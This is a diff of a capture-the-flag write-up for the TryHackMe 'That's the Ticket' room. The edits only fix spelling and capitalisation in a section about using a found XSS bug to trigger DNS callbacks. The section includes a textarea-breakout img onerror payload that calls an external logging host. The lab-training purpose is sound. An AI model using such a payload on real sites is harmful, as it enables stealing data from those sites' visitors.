AssassinUKG/Writeups/tryhackme/thats_the_ticket/writeup.md

 ## DNS time!

-Using the found xss bug we can use this to make callbacks to our machine and from the hint we got earlier. http://10.10.10.100 This is a DNS service that logs dns calls for us.
+Using the found XSS bug we can use this to make callbacks to our machine and from the hint we got earlier. http://10.10.10.100 This is a DNS service that logs DNS calls for us.
 We can also use a site like this, http://pingb.in/

-Knowing we can use xss lets try a call back to the dns service.
+Knowing we can use XSS let's try a call back to the DNS service.

 ```js
 </textarea><img/src=x onerror="//8ba7c46d7ea59d575b71ef3126651b6a.log.tryhackme.tech/"/>